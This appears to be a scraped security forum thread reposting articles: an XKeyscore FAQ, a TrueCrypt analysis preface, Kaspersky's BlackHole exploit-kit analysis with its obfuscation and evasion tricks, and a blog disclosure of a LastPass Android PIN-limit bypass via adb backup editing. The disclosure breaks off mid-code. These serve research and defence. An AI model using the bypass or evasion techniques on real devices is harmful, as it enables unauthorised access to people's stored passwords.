The FISA Amendments Act (2008) requires a warrant for targeting U.S. individuals, but NSA analysts are permitted to intercept the communications of such individuals without a warrant if they are in contact with one of the NSA's foreign targets. The ACLU's deputy legal director, Jameel Jaffer, told The Guardian that national security officials expressly said that a primary purpose of the new law was to enable them to collect large amounts of communications by Americans without individual warrants. One example provided by an XKeyscore document shows an NSA target in Tehran communicating with people in Frankfurt, Amsterdam, and New York.

The Working: What Can It Do?
According to The Washington Post and Marc Ambinder, editor of The Week, XKeyscore is a data retrieval system that consists of a series of interfaces, backend databases, software, and servers that select certain types of metadata that the NSA has already collected, using other methods, from a wide range of different sources:

- F6, which is the SCS or Special Collection Service, operating from a U.S. embassy or consulate overseas.
- FORNSAT, which means "foreign satellite collection," refers to intercepts from satellites that process data used by other countries.
- The Special Source Operations, or SSO, is a branch of the NSA that taps cables, finds microwave paths, and otherwise collects data not generated by F6 or foreign satellites.

A training slide on page 24 of the National Security Agency's 2008 presentation on the program states it quite baldly: "Show me all exploitable machines in country X."

- Fingerprints from TAO (Tailored Access Operations) are loaded into XKeyscore's application/fingerprint engine.
- Data is tagged and databased.
- There is no strong selector; complex Boolean tasking and regular expressions are required.

According to Ars Technica's Sean Gallagher, "the vulnerability fingerprints are added to serve as a filtering criteria for XKeyscore's app engines, comprised of a worldwide distributed cluster of Linux servers attached to the NSA's Internet backbone tap points." He explains how this could give the NSA a toehold for surveillance in various countries: "This could allow the NSA to search broadly for systems within countries such as China or Iran by watching for the network traffic that comes from them through national firewalls, at which point the NSA could exploit those machines to have a presence within those networks."

The slides explain how XKeyscore can track encrypted virtual private network (VPN) sessions and their participants, and can capture metadata on who is using PGP (Pretty Good Privacy) in email or who is encrypting their Word documents, which can later be decrypted. It keeps all trapped Internet traffic for three days, but the metadata is kept for up to 30 days. This one-month duration allows the authorities time to trace the identity of those who created the documents. Further capabilities include Google Maps and web searches. It also has the ability to track the authorship and source of a particular document.

Location: Where is XKeyscore located?

It works with the help of over 700 servers based at U.S. and allied military and other facilities, as well as U.S. embassies and consulates in several dozen countries.

Data Collection and Storage

How much data is being collected? The quantity of communications accessible through programs such as XKeyscore is staggeringly large. One NSA report from 2007 estimated that there were 850 billion "call events" collected and stored in the NSA database and close to 150 billion Internet records. Each day, the document says, 1-2 billion records were added. A 2010 Washington Post article reported that "every day, collection systems at the [NSA] intercept and store 1.7 billion emails, phone records and other types of communications."

How long is the data stored? The XKeyscore system collects a vast amount of Internet data that can be stored only for short periods of time. Content remains on the system for three to five days. The metadata, on the other hand, is stored for 30 days.
One document explains: "At some sites, the amount of data we receive per day (20 plus terabytes) can only be stored for as little as 24 hours." In 2012, there were at least 41 billion records collected and stored in XKeyscore over a single 30-day period.

What was the NSA's response?

In a statement to The Guardian, the NSA said:

"NSA's activities are focused and specifically deployed against - and only against - legitimate foreign intelligence targets in response to requirements that our leaders need for information necessary to protect our nation and its interests.

"XKeyscore is used as a part of NSA's lawful foreign signals intelligence collection system.

"Allegations of widespread, unchecked analyst access to NSA collection data are simply not true. Access to XKeyscore, as well as all of NSA's analytic tools, is limited to only those personnel who require access for their assigned tasks … In addition, there are multiple technical, manual, and supervisory checks and balances within the system to prevent deliberate misuse from occurring.

"Every search by an NSA analyst is fully auditable, to ensure that they are proper and within the law.

"These types of programs allow us to collect the information that enables us to perform our missions successfully - to defend the nation and to protect U.S. and allied troops abroad."

What's more?

Many more aspects of XKeyscore have not been revealed in depth, such as which countries the U.S. shares information with, how the program deals with encrypted content, and how the program has evolved in recent years. Despite all this, the government claims some real benefits, such as 300 terrorists captured by 2008.

References:
http://www.theguardian.com/world/2013/jul/31/nsa-top-secret-program-online-data
http://nakedsecurity.sophos.com/2013/08/02/nsas-xkeyscore-is-a-global-dragnet-for-vulnerable-systems/
http://www.infowars.com/xkeyscore-instrument-of-mass-surveillance/
https://blog.fortinet.com/NSA-s-XKeyscore–the-FAQ/
http://www.huffingtonpost.com/sam-dorison/nsa-data-hacking_b_3708206.html
http://en.wikipedia.org/wiki/XKeyscore
http://www.schneier.com/blog/archives/2013/08/xkeyscore.html
http://techcrunch.com/2013/07/31/nsa-project-x-keyscore-collects-nearly-everything-you-do-on-the-internet/
http://www.thehindu.com/news/international/world/nsas-xkeyscore-surveillance-program-has-servers-in-india/article4978248.ece

Source: http://resources.infosecinstitute.com/xkeyscore-nsas-surveillance-program/

OK, let's assume the NSA, or whoever else, can intercept all traffic. I particularly like one idea from the article:

"The slides explain how XKeyscore can track encrypted virtual private network (VPN) sessions and their participants, and can capture metadata on who is using PGP (Pretty Good Privacy) in email or who is encrypting their Word documents, which can later be decrypted."

In other words, if you use a VPN, PGP in your email, or encrypt your documents... you're a suspect? Meaning the chances of drawing attention are much lower if you apparently behave like a "normal" user, without encrypting your documents and emails?
-
Security Analysis of TrueCrypt 7.0a with an Attack on the Keyfile Algorithm
Ubuntu Privacy Remix Team <info@privacy-cd.org>
August 14, 2011

Contents

Preface
1. Data of the Program
2. Remarks on Binary Packages of TrueCrypt 7.0a
3. Compiling TrueCrypt 7.0a from Sources
   - Compiling TrueCrypt 7.0a on Linux
   - Compiling TrueCrypt 7.0a on Windows
4. Methodology of Analysis
5. The Program tcanalyzer
6. Findings of Analysis
   - The TrueCrypt License
   - Website and Documentation of TrueCrypt
   - Cryptographic Algorithms of TrueCrypt
   - Cryptographic Modes used by TrueCrypt
   - TrueCrypt Volumes and Hidden Volumes
   - The Random Number Generator of TrueCrypt
   - The Format of TrueCrypt Volumes
7. An Attack on TrueCrypt Keyfiles
   - The TrueCrypt Keyfile Algorithm
   - The Manipulation of TrueCrypt Keyfiles
   - Response to the Attack by the TrueCrypt Developers
8. Conclusion

Preface

We previously analyzed versions 4.2a, 6.1a and 6.3a of the TrueCrypt program in source code without publishing our results. Now, however, for our new analysis of version 7.0a we decided to publish it. We hope that it will help people form their own sound opinion on the security of TrueCrypt. Moreover, we solicit help in correcting any mistakes that we have made. To this end, we would like to encourage everyone reading this to send criticism or suggestions for further analysis to us. While preparing the analysis for publication we reassessed our previous results.
In doing so we discovered major weaknesses in the TrueCrypt keyfile algorithm. These could even be turned into a successful attack on TrueCrypt keyfiles. We present that attack in section 7. We want to stress that the security of TrueCrypt containers which do not use keyfiles is in no way affected by these weaknesses and the attack.

TrueCrypt is a multi-platform program. Up to now there are versions for Windows, Linux and Mac OS X. Our analysis mainly focuses on the Linux version. The Windows version has been analyzed to a lesser extent, the Mac OS X version not at all. In large parts the code basis is the same for all operating systems on which TrueCrypt runs. On the other hand, there is some special code for each of these operating systems. This is even reflected in slightly diverging behavior of the program on different operating systems here and there. The source code of TrueCrypt 7.0a moreover contains folders for the operating systems FreeBSD and Solaris. Apparently the source code in these folders hasn't reached a point where a program could be built and distributed from it. Therefore, we completely neglected them.

The report at hand explains the results of our analysis. It is organized as follows: Section 1 lists some data of the analyzed program. Section 2 contains remarks on binary TrueCrypt packages. Section 3 deals with compiling TrueCrypt from the sources. Section 4 explains the methodology of our analysis. In section 5 we describe our program tcanalyzer, which was written for this analysis. Section 6 contains our findings in detail, except for the attack on keyfiles, to which section 7 is devoted. Finally, section 8 presents our conclusions. The rationale for the conclusions in section 8 is mainly presented in section 6. In sections 6 and 7 some elaborate technical or mathematical facts have been documented in the footnotes. Readers who don't have the special skills to understand them may safely ignore them.

Download: https://www.privacy-cd.org/downloads/truecrypt_7.0a-analysis-en.pdf
-
Filling a BlackHole

Contents:
- Exploit packs
- In the black hole
  - An exploit pack's start page
  - Exploit for CVE-2012-5076
  - Exploit for CVE-2012-0507
  - Exploit for CVE-2013-0422
  - Three-in-one
- Protection from Java exploits
  - Stage one: block redirects to the landing page
  - Stage two: detection by the file antivirus module
  - Stage three: signature-based detection of exploits
  - Stage four: proactive detection of exploits
  - Stage five: detection of the downloaded malware (payload)
- Conclusion

Today, exploiting vulnerabilities in legitimate programs is one of the most popular methods of infecting computers. According to our data, user machines are most often attacked using exploits for Oracle Java vulnerabilities. Today's security solutions, however, are capable of effectively withstanding drive-by attacks conducted with the help of exploit packs. In this article, we discuss how a computer can be infected using the BlackHole exploit kit and the relevant protection mechanisms that can be employed.

Exploit packs

As a rule, instead of using a single exploit, attackers employ ready-made sets known as exploit packs. This helps them to significantly increase the effectiveness of 'penetration', since each attack can utilize one or more exploits for software vulnerabilities present on the computer being attacked. Whereas in the past exploits and the malicious programs downloaded with their help to victims' computers were created by the same people, today this segment of the black market operates according to the SaaS (Software as a Service) model. As a result of the division of labor, each group of cybercriminals specializes in its own area: some create and sell exploit packs, others lure users to exploit start pages (drive traffic), and still others write the malware that is distributed via drive-by attacks.

Today, all a cybercriminal wishing to infect user machines with, say, a variant of the ZeuS Trojan needs to do is buy a ready-made exploit pack, set it up and get as many potential victims as possible to visit the start page (also called a landing page). Attackers use several methods to redirect users to an exploit pack's landing page. The most dangerous one for users is hacking the pages of legitimate websites and injecting scripts or iframe elements into their code. In such cases, it is enough for a user to visit a familiar site for a drive-by attack to be launched and for an exploit pack to begin working surreptitiously. Cybercriminals can also use legitimate advertising systems, linking banners and teasers to malicious pages. Another method that is popular among cybercriminals is distributing links to the landing page in spam.

[Diagram: infecting user machines using exploit packs - an overview]

There are numerous exploit packs available on the market: Nuclear Pack, Styx Pack, BlackHole, Sakura and others. In spite of the different names, all these 'solutions' work in the same way: each exploit pack includes a variety of exploits plus an administrator panel. Moreover, the operation of all exploit packs is based on what is essentially the same algorithm. One of the best-known exploit packs on the market is called BlackHole. It includes exploits for vulnerabilities in Adobe Reader, Adobe Flash Player and Oracle Java. For maximum effect, the exploits included in the pack are constantly modified. In early 2013, we studied three exploits for Oracle Java from the BlackHole pack, so we selected BlackHole to illustrate the operating principles of exploit packs.

In the black hole
It should be noted that all data on exploits, the contents of start pages and other specific information discussed in this article (particularly the names of methods and classes and the values of constants) was valid at the time the research was carried out. Cybercriminals are still actively developing BlackHole: they often modify the code of one exploit or another to hinder detection by anti-malware solutions. For example, they may change the decryption algorithm used by one of the exploits. As a result, some of the code may differ from that shown in the examples below; however, the underlying principles of operation remain the same.

Note: we print all changeable data in small type.

An exploit pack's start page

An exploit pack's start page is used to determine input parameters and make decisions about the exploit pack's further actions. Input parameters include the version of the operating system on the user machine, the browser and plugin versions, the system language, etc. As a rule, the exploits to be employed in attacking a system are selected based on the input parameters. If the software required by the exploit pack is not present on the target computer, an attack does not take place. Another reason an attack may not take place is to prevent the exploit pack's contents from falling into the hands of experts at anti-malware companies or other researchers. For example, cybercriminals may 'blacklist' IP addresses used by research companies (crawlers, robots, proxy servers), block exploits from launching on virtual machines, etc.

The screenshot below shows a sample of code from the landing page of the BlackHole exploit kit.

[Screenshot: code from the BlackHole exploit kit's start page]

Even a brief look at the screenshot is sufficient to see that the JavaScript code is obfuscated and most information is encrypted. Visiting the start page will result in execution of the code that was originally encrypted.

The algorithm for decrypting the JavaScript code that was in use in January 2013 works as follows (a small code sketch of this decoding loop follows the list of tricks below): the variables "z1 - zn" are populated with encrypted data, these variables are then concatenated into one string, and the data is decrypted as follows: every two characters (the character "-" is ignored) are considered to make up a 27-ary number, which is converted to decimal; "57" is added to the value obtained and the result is divided by 5; the resulting number is converted back to a character using the function "fromCharCode". The code which performs these operations is marked with blue ovals on the screenshot above. The second array consists of decimal numbers from 0 to 255, which are converted to characters using the ASCII table. Both code fragments obtained by conversion are executed using the "eval" command (shown on the screenshot with red arrows).

The entire algorithm above could have been implemented with a few lines of code, but the cybercriminals used special techniques (marked with yellow ovals in the screenshot) to make detection more difficult:

- deliberately causing an exception with the "document.body*=document" command;
- checking the style of the first <div> element using the command "document.getElementsByTagName("d"+"iv")[0].style.left===""" ; note that an empty <div> element is inserted into the document for this purpose (in the second line);
- calling "if(123)", which makes no sense, since this expression is always true;
- breaking up function names and subsequently concatenating the parts.
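For illustration, here is a small C sketch (my own, not code taken from the kit) of the string-decoding scheme described above: pairs of characters are read as two-digit base-27 numbers, 57 is added, the sum is divided by 5, and the result is emitted as a character code, mirroring the String.fromCharCode step. The digit alphabet used here and the sample input are assumptions for the sake of a runnable example; the real landing page defines its own mapping.

#include <stdio.h>
#include <string.h>

/* Map one character to a base-27 digit value, or -1 if it is not a digit.
 * The 27-symbol alphabet below is an assumption for illustration only. */
static int digit_value(char c)
{
    const char *alphabet = "0123456789abcdefghijklmnopq";
    const char *p = strchr(alphabet, c);
    return p ? (int)(p - alphabet) : -1;
}

/* Decode an encrypted string: take characters two at a time (skipping '-'),
 * treat them as a two-digit base-27 number n, and output (n + 57) / 5 as a
 * character code, as described in the article. */
static void decode(const char *in, char *out, size_t outsz)
{
    size_t o = 0;
    int hi = -1;

    for (; *in != '\0' && o + 1 < outsz; in++) {
        if (*in == '-')
            continue;                      /* '-' is ignored by the decoder */
        int d = digit_value(*in);
        if (d < 0)
            continue;
        if (hi < 0) {
            hi = d;                        /* first digit of the pair */
        } else {
            int n = hi * 27 + d;           /* two-digit base-27 number */
            out[o++] = (char)((n + 57) / 5);
            hi = -1;
        }
    }
    out[o] = '\0';
}

int main(void)
{
    char buf[256];
    decode("8h-8k-8p", buf, sizeof(buf));  /* made-up input, shown for shape only */
    printf("%s\n", buf);
    return 0;
}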
In addition to the tricks described above, cybercriminals make numerous minor code changes that can hamper signature-based detection. Although our antivirus engine, for example, includes a script emulator, and simple changes in constants and operations will not affect the effectiveness of detection, the tricks described above can make things more difficult for an emulator, too.

After decryption, code appears in RAM; we will refer to it as the "decrypted script". It consists of two parts. The first part is a module based on the free PluginDetect library, which can be used to determine the versions and capabilities of most modern browsers and their plugins. Cybercriminals use a variety of libraries, but this module is a key element of any exploit pack. BlackHole uses PluginDetect to select the appropriate exploits for download depending on the software installed on the user machine. By 'appropriate' we mean those exploits which have the highest chances of successfully running and launching malware on a specific PC. The second part of the "decrypted script" is code responsible for processing the results produced by the PluginDetect functions and then downloading the selected exploits and launching them.

In March 2013, BlackHole used exploits for the following vulnerabilities:

- Java versions from 1.7 to 1.7.?.8 – CVE-2012-5076;
- Java versions below 1.6 or from 1.6 to 1.6.?.32 – CVE-2012-0507;
- Java versions from 1.7.?.8 to 1.7.?.10 – CVE-2013-0422;
- Adobe Reader versions below 8 – CVE-2008-2992;
- Adobe Reader version 8 or from 9 to 9.3 – CVE-2010-0188;
- Adobe Flash versions from 10 to 10.2.158 – CVE-2011-0559;
- Adobe Flash versions from 10.3.181.0 to 10.3.181.23 and below 10.3.181 – CVE-2011-2110.

Below we discuss the exploits for the Java vulnerabilities.

Exploit for CVE-2012-5076: technical details
Exploit for CVE-2012-0507: technical details
Exploit for CVE-2013-0422: technical details

Three-in-one

As discussed above, the three Java exploits are based on essentially the same mechanism: they obtain privileges and load the payload, which downloads and launches the target file. The three exploits also generate the same Java class file. This clearly indicates that the same person or people were behind the development of these three exploits. The only difference is the technique used to obtain unrestricted privileges for a class file. The class file can download and launch files, decrypting parameters passed via the decrypted script. To make detection more difficult, the malicious file downloaded is usually encrypted and, consequently, does not start with a PE header. The downloaded file is usually decrypted in memory using the XOR algorithm. Passing parameters via the decrypted script is a convenient way of quickly changing the links pointing to the payload: all this takes is modifying data on the exploit pack's landing page, without having to recompile the malicious Java applet.

The three vulnerabilities discussed above are so-called logical flaws. It is impossible to control exploits for such vulnerabilities using automatic tools such as those monitoring memory integrity or the generation of exceptions. This means that such exploits cannot be detected using Microsoft's DEP or ASLR technologies or other similar automatic tools. However, there are technologies that can cope with this – an example is Kaspersky Lab's Automatic Exploit Prevention (AEP).

Protection from Java exploits
In spite of all the efforts by cybercriminals, today's security solutions can effectively block drive-by attacks conducted using exploit packs. As a rule, protection against exploits consists of an integrated set of technologies that block such attacks at different stages. Above, we provided a description of the BlackHole exploit kit's operating principles. Now we will demonstrate, using Kaspersky Lab solutions as an example, how protection is provided at each stage of an attack using Java exploits from BlackHole. Since other exploit packs operate in a way similar to that implemented in BlackHole, the protection structure discussed here can be applied to them as well.

[Diagram: staged protection against a drive-by attack]

Below we discuss which protection components interact with malicious code and when.

Stage one: block redirects to the landing page

An attack starts as soon as the user reaches the exploit pack's landing page. However, the security solution's web antivirus component can block an attack even before it starts, i.e., before a script on the landing page is launched. This protection component verifies the address of the web page before it is opened. Essentially, this is a simple check of the page's URL against a database of malicious links, but it can block the user from visiting the exploit pack's landing page, provided that its address is already known to belong to a malicious resource. This makes it essential for antivirus vendors to add malicious links to their databases as early as possible.

Malicious URL databases can be located on user machines or in the cloud (i.e., on a remote server). In the latter case, cloud technologies help to minimize the time lag before a security product begins to block new malicious links. The 'response time' is reduced in this case because the security solution installed on the user machine receives information about a new threat as soon as the relevant record is added to the malicious links database, without having to wait for an antivirus database update. Cybercriminals, in turn, try to change the domains used to host exploit pack landing pages very often to prevent security software from blocking these pages. This ultimately reduces the profitability of their business.

Stage two: detection by the file antivirus module

If the user has nevertheless reached an exploit pack's landing page, this is where components of the file antivirus module – the static detector and the heuristic analyzer – come in. They scan the exploit pack's landing page for malicious code. Below we analyze the operating principles, advantages and shortcomings of each component.

The static detector uses static signatures to detect malicious code. Such signatures are triggered only by specific code fragments, essentially by specific byte sequences. This is the threat detection method that was used in the earliest antivirus solutions, and its advantages are well known. They include high performance and ease of storing signatures. All a detector needs to do to come up with a verdict is compare the checksum or byte sequence of the code being analyzed to the relevant records in the antivirus database. Signatures are tens of bytes in size and easily packed, making them easy to store. The most significant shortcoming of a static detector is the ease with which a signature can be 'evaded': all the cybercriminals have to do to make the detector stop detecting an object is change just one byte.
This shortcoming leads to another one: a large number of signatures is needed to cover a large number of files, which means that the databases rapidly grow in size. The heuristic analyzer also uses databases, but works according to a completely different operating principle. It is based on analyzing objects: collecting and intelligently parsing object data, identifying patterns, computing statistics etc. If the data produced as a result of this analysis matches a heuristic signature, the object is detected as malicious. The main advantage of a heuristic signature is that it enables the solution to detect a large number of similar objects provided that the differences between them are not too great. The drawback is that compared to processing static signatures, the heuristic analyzer can be slower and affect system performance. For example, if a heuristic signature is not designed efficiently, i.e., if it requires a large number of operations to perform its checks, this may affect system performance on the machine on which the antivirus solution is running. To prevent an object from being detected using a static signature, cybercriminals need to make minimal changes to the object’s code (script, executable program or file). This process can to some extent be automated. To evade heuristic detection, a malware writer needs to conduct research to find out what mechanism is used to detect the object. When the algorithm has been fully or partially analyzed, changes preventing the heuristic signature from being triggered must be made to the malicious object’s code. Clearly, ‘evading’ a heuristic signature inevitably takes cybercriminals longer than preventing detection using static signatures. This means that heuristic signatures have a longer ‘life span’. On the other hand, after malware writers have modified an object to evade heuristic detection, it also takes an antivirus vendor some time to create a different signature. As discussed above, an anti-malware solution uses different sets of signatures to scan the landing page. In their turn, malware writers modify objects on the exploit pack’s start page in order to evade signature-based detection of both types. While it is sufficient to simply break strings up into characters to evade static signatures, evading heuristics requires making use of the finer features offered by JavaScript – unusual functions, comparisons, logical expressions, etc. An example of this type of obfuscation was provided in the first part of the article. It is at this stage that malware is often detected, particularly due to excessive code obfuscation that can be regarded as a characteristic feature of malicious objects. In addition to databases stored on the computer’s hard drive, there are signatures located in the cloud. Such signatures are usually very simple, but the extremely short new-threat response time (up to five minutes from creating a signature to making it available in the cloud) means that user machines are well protected. Stage three: signature-based detection of exploits. If the security solution fails to recognize the start page of the exploit pack, the latter comes into operation. It checks which browser plugins are installed (Adobe Flash Player, Adobe Reader, Oracle Java, etc.) and makes a decision as to which exploits will be downloaded and launched. The security solution will scan each exploit being downloaded in the same way as it did the exploit pack’s landing page – using the file antivirus module and cloud-based signatures. 
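As a rough illustration of the heuristic approach described above, the sketch below computes a few simple statistics over a landing-page script and combines them into a score; the features, weights and thresholds are invented for illustration and are not Kaspersky's, but the principle (many weak indicators of obfuscation adding up to a verdict) is the one discussed.

import re

def heuristic_score(script_text):
    features = {
        "eval_calls":       script_text.count("eval("),
        "charcode_calls":   script_text.count("fromCharCode"),
        "string_concats":   script_text.count("'+'") + script_text.count('"+"'),
        "escape_sequences": len(re.findall(r"%[0-9a-fA-F]{2}", script_text)),
        "very_long_lines":  sum(1 for line in script_text.splitlines() if len(line) > 2000),
    }
    score = (2 * features["eval_calls"] + 2 * features["charcode_calls"]
             + features["string_concats"] // 10 + features["escape_sequences"] // 50
             + 5 * features["very_long_lines"])
    return score, features

score, details = heuristic_score("eval(unescape('%61%6c%65%72%74'))")
print(score, details)  # even this tiny sample registers on the eval/escape features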
The attackers in their turn try to evade detection using certain techniques, which are similar to those described above. Stage four: proactive detection of exploits. If none of the components responsible for reactive (signature-based) protection has detected anything suspicious while scanning the exploit pack’s contents and an exploit has launched, this is where proactive protection modules come in. They monitor the behavior of applications in the system in real time and identify any malicious activity. Each application is categorized, based on information provided by heuristic analysis, data from the cloud and other criteria, as “Trusted”, “Low Restricted”, “High Restricted” or “Untrusted”. Application Control restricts each application’s activity based on its category. Applications in the Trusted class are allowed all types of activity, those in the Low Restricted group are denied access to such resources as password storage, programs in the High Restricted category are not allowed to make changes to system folders, etc. All the applications being launched and all those running are analyzed by a module called Application Control in Kaspersky Lab products. This component monitors program execution in the system using low-level hooks. In addition to the above, so-called behavior stream signatures (BSS) describing malicious activity are used to detect the dangerous behavior of applications. Such signatures are developed by virus analysts and are subsequently compared to the behavior of active applications. This enables proactive protection to detect new malware versions that were not included in the Untrusted or High Restricted categories. It should be noted that this type of detection is the most effective, since it is based on analyzing data on applications’ actual current activity rather than static or heuristic analysis. It renders such techniques as code obfuscation and encryption completely ineffective, because they in no way affect the behavior of a malicious program. For more stringent control of applications to prevent their vulnerabilities from being exploited, we use a technology called Automatic Exploit Prevention (AEP). The AEP component monitors each process as it is launched in the system. Specifically, it checks the call stack for anomalies, checks the code which launched each process, etc. In addition, it performs selective checks of dynamic libraries loaded into processes. All this prevents malicious processes from being launched as a result of exploiting vulnerabilities. This is in fact the last line of defense, providing protection against exploits in the event that other protection components have failed. If an application, such as Oracle Java or Adobe Reader, behaves suspiciously as a result of exploitation, the vulnerable legitimate application will be blocked by the anti-malware solution, preventing the exploit from doing harm. Since protection at this stage is based on the program’s behavior, cybercriminals have to use sophisticated and labor-intensive techniques to evade proactive protection. Stage five: detection of the downloaded malware (payload). If an exploit does go undetected, it attempts to download the payload and run it on the user machine. As we wrote above, the malicious file is usually encrypted to make detection more difficult, which means that it does not begin with a PE header. The file downloaded is usually decrypted in memory using the XOR algorithm. 
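A minimal sketch of the in-memory decryption step just described, assuming a single-byte XOR key (real samples vary): on the wire the blob has no PE header, and only after the XOR pass does the familiar "MZ" magic appear.

def xor_decode(blob, key):
    # XOR every byte with the key; a multi-byte key would simply cycle through its bytes
    return bytes(b ^ key for b in blob)

encrypted = bytes(b ^ 0x42 for b in b"MZ\x90\x00...rest of the PE file...")
print(encrypted[:2])               # not b"MZ" -> looks like an opaque data stream in transit
decoded = xor_decode(encrypted, 0x42)
print(decoded[:2] == b"MZ")        # True -> a PE image again, ready to be launched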
Then the file is either launched from memory (usually, this is a dynamic library) or dropped on the hard drive and then launched from the hard drive. The trick of downloading an encrypted PE file enables the malware to fool antivirus solutions, because such downloads look like ordinary data streams. However, it is essential that the exploit launches a decrypted executable file on the user machine. And an anti-malware solution will subject that file to all the various protection technologies discussed above. Conclusion. Exploit packs are an integrated system for attacking victim machines. Cybercriminals devote a lot of time and effort to maintain the effectiveness of exploit packs and minimize detections. In their turn, anti-malware companies are continually improving their security solutions. Anti-malware vendors now have a range of technologies that can block drive-by attacks at all stages, including those involving exploitation of vulnerabilities. Sursa: https://www.securelist.com/en/analysis/204792303/Filling_a_BlackHole
-
[h=1]Ads can bombard us in our sleep. It's already happening in Germany. VIDEO[/h] Train passengers who rest their heads against the window are woken by a voice presenting them a new product or service. Their surprise is even greater when they realize they are the only ones who can hear the message. The technology that makes it all possible is called "bone conduction" and, in the coming years, it could be present in most trains and buses, according to stirileprotv.ro. With suburban commuters in mind, an advertising agency in Dusseldorf came up with a novel proposal: the "talking window", which seems to communicate almost telepathically, only with those who touch their heads to the glass. Out of nowhere, passengers whose heads slip in their sleep and lean against the window hear an advertising message. When they realize the window is "talking" to them, most check the reactions of those around them. They are truly surprised when they realize they are the only ones in the carriage who can hear the message. It is all possible thanks to a small device placed on the window, programmed to vibrate when it senses pressure. Sebastian Hardieck, creative department: "A bone in the body vibrates, and the ear then interprets those high-frequency vibrations and turns them into sound. You bring your head close to the window and hear no sound, yet the ear still seems to pick it up... It is very interesting." The technology is called "bone conduction" and allows sounds to be transmitted through the vibration of the skull bones. Although some claim this is what the advertising of the future looks like, not everyone is thrilled with the idea. Matthias Oomen, public transport association: "We are not at all amused by the idea of a talking window. Public transport has many advantages, and one of them is that you can travel in peace. This issue is just as important as ticket prices or passenger safety." For now the idea is only making waves on the internet, but two thirds of the comments gathered are negative. Some are even calling for a boycott of the companies that will use such technology to promote their products. Sursa: Reclamele ne pot bombarda in somn. Se intampla deja in Germania. VIDEO - www.yoda.ro
-
And what if all these things being said about the NSA are made up so that we put more emphasis on security?
-
[0-Day] vBulletin 4.2.x - Multiple Cross-Site-Scripting Vulnerabilities
Nytro replied to sensi's topic in Exploituri
Where was it made public before? -
A sneak peek into Android “Secure” Containers Posted by ChrisJohnRiley on September 5, 2013

It’s been a bit quiet here on the blog, so I thought I’d take a few minutes to write up an issue I raised with the fine folks over at LastPass. Alongside the HTTP Response Code stuff, I’ve been playing around more and more with Android applications. One of the things I presented on in Vegas at the BSidesLV Underground track was breaking into Android Secure Containers. The name of the talk was cryptic for sure, mostly because said “secure” containers were anything but secure, and because I hadn’t had time to report the issues to the affected vendors. The issues I discussed weren’t tied to a single application, and affect numerous apps within the Play Store… So, here we are a month later, and LastPass has rolled out a “fix” for the issue I reported to them. This means I can give you the down and dirty details now that you’ve all updated your Android devices to the latest LastPass version (currently 2.5.1). FYI: the CVE numbers for these issues, although not referenced in the LastPass changelogs as yet, are CVE-2013-5113 and CVE-2013-5114. This research needs a little back story to explain it, so bear with me for a minute while I set the stage.

Back Story / Testing Scenario
I started down this research track when I was looking at how Android applications provide additional security through PIN and/or password protection of specific applications. This additional layer of security offered by applications like LastPass is there to stop people who have physical access to your Android device from getting into the more secure areas of your data (e.g. passwords). With this in mind I expected the implementation of these protections to be designed to stand up to an attacker with physical access to the device (aka somebody who’s stolen/borrowed/found your Android device).

Some Facts
Without root access to the Android device, it’s not directly possible to view or alter the data of specific applications. Even if USB debugging is enabled (by the owner, or later by an attacker with device access) it’s only possible to view specific data on the Android device, not all the juicy stuff. Everything I’m about to discuss is possible on a non-rooted device; however, USB debugging needs to be enabled to allow us to interact with the device using adb. Remember, the scenario we’re talking about here is physical device access, so this shouldn’t be a big hurdle. Note: It goes without saying that everything that can be achieved here with ADB/USB debugging can also be achieved through exploitation of the device… although there are much more fun things to do if you’re popping shell on a device.

The LastPass Case
LastPass allows a user to save their password within the Android application so that you don’t need to type it every time you open the app. This isn’t abnormal for applications, and like any good security minded application they give you options to secure the access using something other than your long long password (aka… the PIN). Given my experience, users of such applications have too much faith in the security of their devices and have no desire to type in their 32 character random LastPass password whenever they open the application (have you tried that on a handheld device? Yeah, not fun…). Much better to store the password in the secure container settings and assign a PIN to protect the app (because that’s secure!).
So with the back story and the explanation out of the way, here’s the meat of the issue.

The Meat
When I first started testing LastPass on Android (version 2.0.4 at the time) I noticed something interesting about the AndroidManifest. In particular, android:allowBackup was set to True, meaning that even though I couldn’t read or edit the configuration/settings of LastPass directly on the device (remember, non-rooted device) or via ADB (remember, USB debugging enabled, but even then no direct access), I could perform backup and restore operations via ADB. This led me down the trail of learning more about the “adb backup” command (introduced in Android ICS). What makes adb backup and restore so useful in this context is the ability to not only back up a device entirely over USB, but also to specifically back up individual application data (with or without the APK file). This makes the backup and restore much more flexible for what we’re looking at doing. After all, backing up an entire 16GB device every time gets tiring (I’m looking at you iOS). By performing an adb backup (command: adb backup com.lastpass.lpandroid -apk) and accepting the prompt on the device, you end up with a backup.ab file containing the LastPass application (APK) and the data/configuration/settings from the application. There have been numerous discussions on the format used by Android Backup files, but I wasn’t happy with any of the solutions offered to decrypt the AB files into something usable. So I decided to automate the lengthy process in Python (see BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley) and add in some features to ease things a little. The final result is a directory output of the LastPass application (with or without the APK – your choice – screenshot is without APK). Taking a look at the files, the sp/LPandroid.xml quickly stood out as worth further analysis. As expected, the configuration file contained the username and password in encoded format (if saved within the LastPass app). Alongside this, the XML also contains an encoded version of the PIN and various other application settings. Putting aside the possibility of decoding the password and PIN, a few settings caught my eye for easy wins:

reprompt_tries
This is a simple integer that increases as incorrect PINs are entered
passwordrepromptonactive / pincodeforreprompt (holds the encoded PIN) / requirepin
These control the password reprompt on startup and the PIN protection (yeah, you can see where this is going already)

The Story So Far
We have access to the LastPass configuration of a non-rooted device via adb backup… and we can fiddle with the resulting configuration file. However we’re still playing about with the XML inside a backup and not with the device itself. We need to get the changes back into the device.

Next Step
Using more Python trickery goodness (see BSidesLV: Android Backup [un]packer release | Catch22 (in)security / ChrisJohnRiley) we can take the directory structure created and rebuild the Android Backup file (with the changes that we’ve made to the files of course). Then we can restore the backup to the device (if you still have access to it) or to your own device/emulator (make sure you have the APK in the backup file or the app already installed if you want to restore to another device).

Effects
As expected, playing with reprompt_tries by setting it to a minus number (-9999 for example) allows you to bypass the 5-PIN-attempts-before-wipe feature of LastPass. This essentially gives you 10,000 retries. If you can’t guess a 4 digit PIN in 10,000 retries, then nothing can help you.
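For readers who want to poke at the format themselves, here is a minimal Python sketch of the first half of that workflow: turning an unencrypted adb backup into a plain tar so sp/LPandroid.xml can be inspected and edited. It assumes the commonly documented .ab layout (a short text header followed by a zlib-compressed tar) and only handles unencrypted backups; the full unpack/repack logic lives in the scripts linked above.

import tarfile, zlib

def ab_to_tar(ab_path, tar_path):
    with open(ab_path, "rb") as f:
        data = f.read()
    # header: four newline-terminated lines -- magic, format version, compression flag, encryption
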